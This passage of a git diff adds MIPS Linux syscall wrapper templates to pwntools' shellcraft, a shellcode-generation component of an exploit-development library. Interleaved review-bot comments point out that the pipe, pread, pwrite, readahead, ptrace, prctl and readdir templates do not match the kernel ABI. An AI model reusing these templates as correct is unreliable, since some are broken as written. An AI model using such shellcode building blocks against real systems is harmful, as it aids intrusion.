b/pwnlib/shellcraft/templates/mips/linux/msync.asm new file mode 100644 index 000000000..a6ea9181d --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/msync.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="addr, len, flags"/> +<%docstring> +Invokes the syscall msync. See 'man 2 msync' for more information. + +Arguments: + addr(void): addr + len(size_t): len + flags(int): flags + + + ${syscall('SYS_msync', addr, len, flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/munlock.asm b/pwnlib/shellcraft/templates/mips/linux/munlock.asm new file mode 100644 index 000000000..f0ac268be --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/munlock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall munlock. See 'man 2 munlock' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_munlock', addr, len)} diff --git a/pwnlib/shellcraft/templates/mips/linux/munlockall.asm b/pwnlib/shellcraft/templates/mips/linux/munlockall.asm new file mode 100644 index 000000000..5cc86c624 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/munlockall.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall munlockall. See 'man 2 munlockall' for more information. + +Arguments: + + + + ${syscall('SYS_munlockall')} diff --git a/pwnlib/shellcraft/templates/mips/linux/munmap.asm b/pwnlib/shellcraft/templates/mips/linux/munmap.asm new file mode 100644 index 000000000..e768182c0 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/munmap.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall munmap. See 'man 2 munmap' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_munmap', addr, len)} 
diff --git a/pwnlib/shellcraft/templates/mips/linux/nanosleep.asm b/pwnlib/shellcraft/templates/mips/linux/nanosleep.asm new file mode 100644 index 000000000..8f9a8d6b9 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/nanosleep.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="requested_time, remaining"/> +<%docstring> +Invokes the syscall nanosleep. See 'man 2 nanosleep' for more information. + +Arguments: + requested_time(timespec): requested_time + remaining(timespec): remaining + + + ${syscall('SYS_nanosleep', requested_time, remaining)} diff --git a/pwnlib/shellcraft/templates/mips/linux/nice.asm b/pwnlib/shellcraft/templates/mips/linux/nice.asm new file mode 100644 index 000000000..2ad59d64a --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/nice.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="inc"/> +<%docstring> +Invokes the syscall nice. See 'man 2 nice' for more information. + +Arguments: + inc(int): inc + + + ${syscall('SYS_nice', inc)} diff --git a/pwnlib/shellcraft/templates/mips/linux/open.asm b/pwnlib/shellcraft/templates/mips/linux/open.asm new file mode 100644 index 000000000..9cfbcb99d --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/open.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="file, oflag, vararg"/> +<%docstring> +Invokes the syscall open. See 'man 2 open' for more information. + +Arguments: + file(char): file + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_open', file, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/mips/linux/openat.asm b/pwnlib/shellcraft/templates/mips/linux/openat.asm new file mode 100644 index 000000000..31cdd8c67 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/openat.asm 
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, file, oflag, vararg"/> +<%docstring> +Invokes the syscall openat. See 'man 2 openat' for more information. + +Arguments: + fd(int): fd + file(char): file + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_openat', fd, file, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/mips/linux/pause.asm b/pwnlib/shellcraft/templates/mips/linux/pause.asm new file mode 100644 index 000000000..ac312b6a6 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/pause.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall pause. See 'man 2 pause' for more information. + +Arguments: + + + + ${syscall('SYS_pause')} diff --git a/pwnlib/shellcraft/templates/mips/linux/pipe.asm b/pwnlib/shellcraft/templates/mips/linux/pipe.asm new file mode 100644 index 000000000..dc4bc15c6 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/pipe.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pipedes"/> +<%docstring> +Invokes the syscall pipe. See 'man 2 pipe' for more information. + +Arguments: + pipedes(int): pipedes + + + ${syscall('SYS_pipe', pipedes)} diff --git a/pwnlib/shellcraft/templates/mips/linux/pipe2.asm b/pwnlib/shellcraft/templates/mips/linux/pipe2.asm new file mode 100644 index 000000000..a5af25dd5 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/pipe2.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pipedes, flags"/> +<%docstring> +Invokes the syscall pipe2. See 'man 2 pipe2' for more information. + +Arguments: + pipedes(int): pipedes + flags(int): flags + + + ${syscall('SYS_pipe2', pipedes, flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/poll.asm b/pwnlib/shellcraft/templates/mips/linux/poll.asm new file mode 100644 index 000000000..ff7197810 --- /dev/null 
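Review bot: pipe.asm invokes `SYS_pipe` with `pipedes` as its only argument, but as far as I know the MIPS kernel's `pipe` takes no pointer and returns the two descriptors in $v0 and $v1, with the glibc wrapper being what writes them into the caller's array. As generated, the template therefore leaves `pipedes` untouched and leaves the read end in $v0 and the write end in $v1 after the syscall, which nothing in the docstring tells a caller. Either document that (`On MIPS the descriptors are returned in $v0/$v1 and pipedes is not written`) or store $v0/$v1 through the pointer after the syscall; pipe2.asm does take the pointer and is unaffected.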
+++ b/pwnlib/shellcraft/templates/mips/linux/poll.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fds, nfds, timeout"/> +<%docstring> +Invokes the syscall poll. See 'man 2 poll' for more information. + +Arguments: + fds(pollfd): fds + nfds(nfds_t): nfds + timeout(int): timeout + + + ${syscall('SYS_poll', fds, nfds, timeout)} diff --git a/pwnlib/shellcraft/templates/mips/linux/ppoll.asm b/pwnlib/shellcraft/templates/mips/linux/ppoll.asm new file mode 100644 index 000000000..f5b8cdaa6 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/ppoll.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fds, nfds, timeout, ss"/> +<%docstring> +Invokes the syscall ppoll. See 'man 2 ppoll' for more information. + +Arguments: + fds(pollfd): fds + nfds(nfds_t): nfds + timeout(timespec): timeout + ss(sigset_t): ss + + + ${syscall('SYS_ppoll', fds, nfds, timeout, ss)} diff --git a/pwnlib/shellcraft/templates/mips/linux/prctl.asm b/pwnlib/shellcraft/templates/mips/linux/prctl.asm new file mode 100644 index 000000000..b4048c641 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/prctl.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="option, vararg"/> +<%docstring> +Invokes the syscall prctl. See 'man 2 prctl' for more information. + +Arguments: + option(int): option + vararg(int): vararg + + + ${syscall('SYS_prctl', option, vararg)} diff --git a/pwnlib/shellcraft/templates/mips/linux/pread.asm b/pwnlib/shellcraft/templates/mips/linux/pread.asm new file mode 100644 index 000000000..3396fffe3 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/pread.asm 
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, buf, nbytes, offset"/> +<%docstring> +Invokes the syscall pread. See 'man 2 pread' for more information. + +Arguments: + fd(int): fd + buf(void): buf + nbytes(size_t): nbytes + offset(off_t): offset + + + ${syscall('SYS_pread', fd, buf, nbytes, offset)} diff --git a/pwnlib/shellcraft/templates/mips/linux/preadv.asm b/pwnlib/shellcraft/templates/mips/linux/preadv.asm new file mode 100644 index 000000000..75dbcaf3a --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/preadv.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, iovec, count, offset"/> +<%docstring> +Invokes the syscall preadv. See 'man 2 preadv' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + offset(off_t): offset + + + ${syscall('SYS_preadv', fd, iovec, count, offset)} diff --git a/pwnlib/shellcraft/templates/mips/linux/prlimit64.asm b/pwnlib/shellcraft/templates/mips/linux/prlimit64.asm new file mode 100644 index 000000000..d2534651a --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/prlimit64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pid, resource, new_limit, old_limit"/> +<%docstring> +Invokes the syscall prlimit64. See 'man 2 prlimit64' for more information. + +Arguments: + pid(pid_t): pid + resource(rlimit_resource): resource + new_limit(rlimit64): new_limit + old_limit(rlimit64): old_limit + + + ${syscall('SYS_prlimit64', pid, resource, new_limit, old_limit)} diff --git a/pwnlib/shellcraft/templates/mips/linux/profil.asm b/pwnlib/shellcraft/templates/mips/linux/profil.asm new file mode 100644 index 000000000..7878c43d4 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/profil.asm 
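Review bot: pread.asm maps `offset(off_t)` onto the fourth syscall argument, but the MIPS o32 `pread64` syscall takes its 64-bit offset as a register pair after an alignment pad (`fd, buf, count, pad, offset_lo, offset_hi`), so a four-argument call leaves the pad and the high half undefined; pwrite.asm and readahead.asm later in this diff have the same shape. Whether `SYS_pread` even resolves in the MIPS constants (the kernel defines `pread64`) is not visible here. Until the helper handles 64-bit arguments the docstring should say so, e.g. `offset is passed as one 32-bit word; the o32 ABI expects a padded 64-bit pair, so this call is not ABI-correct as generated.`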
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="sample_buffer, size, offset, scale"/> +<%docstring> +Invokes the syscall profil. See 'man 2 profil' for more information. + +Arguments: + sample_buffer(unsigned): sample_buffer + size(size_t): size + offset(size_t): offset + scale(unsigned): scale + + + ${syscall('SYS_profil', sample_buffer, size, offset, scale)} diff --git a/pwnlib/shellcraft/templates/mips/linux/ptrace.asm b/pwnlib/shellcraft/templates/mips/linux/ptrace.asm new file mode 100644 index 000000000..90c614c11 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/ptrace.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="request, vararg"/> +<%docstring> +Invokes the syscall ptrace. See 'man 2 ptrace' for more information. + +Arguments: + request(ptrace_request): request + vararg(int): vararg + + + ${syscall('SYS_ptrace', request, vararg)} diff --git a/pwnlib/shellcraft/templates/mips/linux/putpmsg.asm b/pwnlib/shellcraft/templates/mips/linux/putpmsg.asm new file mode 100644 index 000000000..8a8d3304b --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/putpmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fildes, ctlptr, dataptr, band, flags"/> +<%docstring> +Invokes the syscall putpmsg. See 'man 2 putpmsg' for more information. + +Arguments: + fildes(int): fildes + ctlptr(strbuf): ctlptr + dataptr(strbuf): dataptr + band(int): band + flags(int): flags + + + ${syscall('SYS_putpmsg', fildes, ctlptr, dataptr, band, flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/pwrite.asm b/pwnlib/shellcraft/templates/mips/linux/pwrite.asm new file mode 100644 index 000000000..afc9d9aa8 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/pwrite.asm 
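Review bot: ptrace.asm collapses the variadic tail into a single `vararg`, but the `ptrace` syscall takes `request, pid, addr, data`, so callers cannot supply `addr` and `data` through this template and common requests are not expressible; prctl.asm on the previous diff line has the same two-argument shape for a five-argument syscall. The templates appear to be generated from libc prototypes, so this is worth stating rather than silently truncating: `Only one extra argument is accepted; ptrace's pid, addr and data cannot all be passed through this template.` If the generator can take the kernel signature instead, `<%page args="request, pid, addr, data"/>` with `${syscall('SYS_ptrace', request, pid, addr, data)}` is the better fix.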
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, buf, n, offset"/> +<%docstring> +Invokes the syscall pwrite. See 'man 2 pwrite' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + offset(off_t): offset + + + ${syscall('SYS_pwrite', fd, buf, n, offset)} diff --git a/pwnlib/shellcraft/templates/mips/linux/pwritev.asm b/pwnlib/shellcraft/templates/mips/linux/pwritev.asm new file mode 100644 index 000000000..66c9abb0e --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/pwritev.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, iovec, count, offset"/> +<%docstring> +Invokes the syscall pwritev. See 'man 2 pwritev' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + offset(off_t): offset + + + ${syscall('SYS_pwritev', fd, iovec, count, offset)} diff --git a/pwnlib/shellcraft/templates/mips/linux/read.asm b/pwnlib/shellcraft/templates/mips/linux/read.asm index fd5805e9f..bc0fa9618 100644 --- a/pwnlib/shellcraft/templates/mips/linux/read.asm +++ b/pwnlib/shellcraft/templates/mips/linux/read.asm @@ -1,6 +1,6 @@ <% -from pwnlib.shellcraft.mips.linux import syscall + from pwnlib.shellcraft.mips.linux import syscall %> <%page args="fd, buf, nbytes"/> <%docstring> diff --git a/pwnlib/shellcraft/templates/mips/linux/readahead.asm b/pwnlib/shellcraft/templates/mips/linux/readahead.asm new file mode 100644 index 000000000..f6a23eb3f --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/readahead.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, offset, count"/> +<%docstring> +Invokes the syscall readahead. See 'man 2 readahead' for more information. + +Arguments: + fd(int): fd + offset(off64_t): offset + count(size_t): count + + + ${syscall('SYS_readahead', fd, offset, count)} 
diff --git a/pwnlib/shellcraft/templates/mips/linux/readdir.asm b/pwnlib/shellcraft/templates/mips/linux/readdir.asm new file mode 100644 index 000000000..be347b188 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/readdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="dirp"/> +<%docstring> +Invokes the syscall readdir. See 'man 2 readdir' for more information. + +Arguments: + dirp(DIR): dirp + + + ${syscall('SYS_readdir', dirp)} diff --git a/pwnlib/shellcraft/templates/mips/linux/readlink.asm b/pwnlib/shellcraft/templates/mips/linux/readlink.asm new file mode 100644 index 000000000..2e4c3b1ba --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/readlink.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="path, buf, len"/> +<%docstring> +Invokes the syscall readlink. See 'man 2 readlink' for more information. + +Arguments: + path(char): path + buf(char): buf + len(size_t): len + + + ${syscall('SYS_readlink', path, buf, len)} diff --git a/pwnlib/shellcraft/templates/mips/linux/readlinkat.asm b/pwnlib/shellcraft/templates/mips/linux/readlinkat.asm new file mode 100644 index 000000000..38f2bcccb --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/readlinkat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, path, buf, len"/> +<%docstring> +Invokes the syscall readlinkat. See 'man 2 readlinkat' for more information. + +Arguments: + fd(int): fd + path(char): path + buf(char): buf + len(size_t): len + + + ${syscall('SYS_readlinkat', fd, path, buf, len)} diff --git a/pwnlib/shellcraft/templates/mips/linux/readv.asm b/pwnlib/shellcraft/templates/mips/linux/readv.asm new file mode 100644 index 000000000..d1571ae97 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/readv.asm 
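Review bot: readdir.asm takes `dirp(DIR)` and passes that single pointer to `SYS_readdir`, which mirrors the libc `readdir(3)` prototype rather than the kernel's: the legacy `readdir` syscall takes `fd, dirent, count`, and `DIR` is a libc-private structure that does not exist in shellcode. As written the template cannot produce a working call; the `getdents` helper this commit adds elsewhere is presumably the intended route. Either drop the template or give it the kernel signature, `<%page args="fd, dirent, count"/>` with `${syscall('SYS_readdir', fd, dirent, count)}`, and note in the docstring that it wraps the one-entry legacy syscall.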
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, iovec, count"/> +<%docstring> +Invokes the syscall readv. See 'man 2 readv' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + + + ${syscall('SYS_readv', fd, iovec, count)} diff --git a/pwnlib/shellcraft/templates/mips/linux/recv.asm b/pwnlib/shellcraft/templates/mips/linux/recv.asm new file mode 100644 index 000000000..d8c6ed2bb --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/recv.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, buf, n, flags"/> +<%docstring> +Invokes the syscall recv. See 'man 2 recv' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + flags(int): flags + + + ${syscall('SYS_recv', fd, buf, n, flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/recvfrom.asm b/pwnlib/shellcraft/templates/mips/linux/recvfrom.asm new file mode 100644 index 000000000..7a737cf91 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/recvfrom.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, buf, n, flags, addr, addr_len"/> +<%docstring> +Invokes the syscall recvfrom. See 'man 2 recvfrom' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + flags(int): flags + addr(SOCKADDR_ARG): addr + addr_len(socklen_t): addr_len + + + ${syscall('SYS_recvfrom', fd, buf, n, flags, addr, addr_len)} diff --git a/pwnlib/shellcraft/templates/mips/linux/recvmmsg.asm b/pwnlib/shellcraft/templates/mips/linux/recvmmsg.asm new file mode 100644 index 000000000..673b20eed --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/recvmmsg.asm 
@@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, vmessages, vlen, flags, tmo"/> +<%docstring> +Invokes the syscall recvmmsg. See 'man 2 recvmmsg' for more information. + +Arguments: + fd(int): fd + vmessages(mmsghdr): vmessages + vlen(unsigned): vlen + flags(int): flags + tmo(timespec): tmo + + + ${syscall('SYS_recvmmsg', fd, vmessages, vlen, flags, tmo)} diff --git a/pwnlib/shellcraft/templates/mips/linux/recvmsg.asm b/pwnlib/shellcraft/templates/mips/linux/recvmsg.asm new file mode 100644 index 000000000..4f0d8da52 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/recvmsg.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, message, flags"/> +<%docstring> +Invokes the syscall recvmsg. See 'man 2 recvmsg' for more information. + +Arguments: + fd(int): fd + message(msghdr): message + flags(int): flags + + + ${syscall('SYS_recvmsg', fd, message, flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/remap_file_pages.asm b/pwnlib/shellcraft/templates/mips/linux/remap_file_pages.asm new file mode 100644 index 000000000..192bf8c15 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/remap_file_pages.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="start, size, prot, pgoff, flags"/> +<%docstring> +Invokes the syscall remap_file_pages. See 'man 2 remap_file_pages' for more information. + +Arguments: + start(void): start + size(size_t): size + prot(int): prot + pgoff(size_t): pgoff + flags(int): flags + + + ${syscall('SYS_remap_file_pages', start, size, prot, pgoff, flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/rename.asm b/pwnlib/shellcraft/templates/mips/linux/rename.asm new file mode 100644 index 000000000..79e1abd57 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/rename.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="old, new"/> +<%docstring> +Invokes the syscall rename. See 'man 2 rename' for more information. + +Arguments: + old(char): old + new(char): new + + + ${syscall('SYS_rename', old, new)} diff --git a/pwnlib/shellcraft/templates/mips/linux/renameat.asm b/pwnlib/shellcraft/templates/mips/linux/renameat.asm new file mode 100644 index 000000000..e01bd0215 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/renameat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="oldfd, old, newfd, new"/> +<%docstring> +Invokes the syscall renameat. See 'man 2 renameat' for more information. + +Arguments: + oldfd(int): oldfd + old(char): old + newfd(int): newfd + new(char): new + + + ${syscall('SYS_renameat', oldfd, old, newfd, new)} diff --git a/pwnlib/shellcraft/templates/mips/linux/rmdir.asm b/pwnlib/shellcraft/templates/mips/linux/rmdir.asm new file mode 100644 index 000000000..8ea0cb902 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/rmdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall rmdir. See 'man 2 rmdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_rmdir', path)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sched_get_priority_max.asm b/pwnlib/shellcraft/templates/mips/linux/sched_get_priority_max.asm new file mode 100644 index 000000000..0f4f67e48 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sched_get_priority_max.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_max. See 'man 2 sched_get_priority_max' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_max', algorithm)} 
diff --git a/pwnlib/shellcraft/templates/mips/linux/sched_get_priority_min.asm b/pwnlib/shellcraft/templates/mips/linux/sched_get_priority_min.asm new file mode 100644 index 000000000..37d2749f3 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sched_get_priority_min.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_min. See 'man 2 sched_get_priority_min' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_min', algorithm)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sched_getaffinity.asm b/pwnlib/shellcraft/templates/mips/linux/sched_getaffinity.asm new file mode 100644 index 000000000..54b7f497e --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sched_getaffinity.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_getaffinity. See 'man 2 sched_getaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_getaffinity', pid, cpusetsize, cpuset)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sched_getparam.asm b/pwnlib/shellcraft/templates/mips/linux/sched_getparam.asm new file mode 100644 index 000000000..044e3e8a8 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sched_getparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_getparam. See 'man 2 sched_getparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_getparam', pid, param)} 
diff --git a/pwnlib/shellcraft/templates/mips/linux/sched_getscheduler.asm b/pwnlib/shellcraft/templates/mips/linux/sched_getscheduler.asm new file mode 100644 index 000000000..148708151 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sched_getscheduler.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall sched_getscheduler. See 'man 2 sched_getscheduler' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_sched_getscheduler', pid)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sched_rr_get_interval.asm b/pwnlib/shellcraft/templates/mips/linux/sched_rr_get_interval.asm new file mode 100644 index 000000000..1030632cc --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sched_rr_get_interval.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pid, t"/> +<%docstring> +Invokes the syscall sched_rr_get_interval. See 'man 2 sched_rr_get_interval' for more information. + +Arguments: + pid(pid_t): pid + t(timespec): t + + + ${syscall('SYS_sched_rr_get_interval', pid, t)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sched_setaffinity.asm b/pwnlib/shellcraft/templates/mips/linux/sched_setaffinity.asm new file mode 100644 index 000000000..d162025e0 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sched_setaffinity.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_setaffinity. See 'man 2 sched_setaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_setaffinity', pid, cpusetsize, cpuset)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sched_setparam.asm b/pwnlib/shellcraft/templates/mips/linux/sched_setparam.asm new file mode 100644 index 000000000..c522cd627 --- /dev/null 
+++ b/pwnlib/shellcraft/templates/mips/linux/sched_setparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_setparam. See 'man 2 sched_setparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_setparam', pid, param)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sched_setscheduler.asm b/pwnlib/shellcraft/templates/mips/linux/sched_setscheduler.asm new file mode 100644 index 000000000..e02e2c002 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sched_setscheduler.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pid, policy, param"/> +<%docstring> +Invokes the syscall sched_setscheduler. See 'man 2 sched_setscheduler' for more information. + +Arguments: + pid(pid_t): pid + policy(int): policy + param(sched_param): param + + + ${syscall('SYS_sched_setscheduler', pid, policy, param)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sched_yield.asm b/pwnlib/shellcraft/templates/mips/linux/sched_yield.asm new file mode 100644 index 000000000..c743c9acf --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sched_yield.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sched_yield. See 'man 2 sched_yield' for more information. + +Arguments: + + + + ${syscall('SYS_sched_yield')} diff --git a/pwnlib/shellcraft/templates/mips/linux/select.asm b/pwnlib/shellcraft/templates/mips/linux/select.asm new file mode 100644 index 000000000..2df687a34 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/select.asm 
@@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="nfds, readfds, writefds, exceptfds, timeout"/> +<%docstring> +Invokes the syscall select. See 'man 2 select' for more information. + +Arguments: + nfds(int): nfds + readfds(fd_set): readfds + writefds(fd_set): writefds + exceptfds(fd_set): exceptfds + timeout(timeval): timeout + + + ${syscall('SYS_select', nfds, readfds, writefds, exceptfds, timeout)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sendfile.asm b/pwnlib/shellcraft/templates/mips/linux/sendfile.asm new file mode 100644 index 000000000..980303137 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sendfile.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile. See 'man 2 sendfile' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sendfile64.asm b/pwnlib/shellcraft/templates/mips/linux/sendfile64.asm new file mode 100644 index 000000000..523e4d524 --- /dev/null +++ 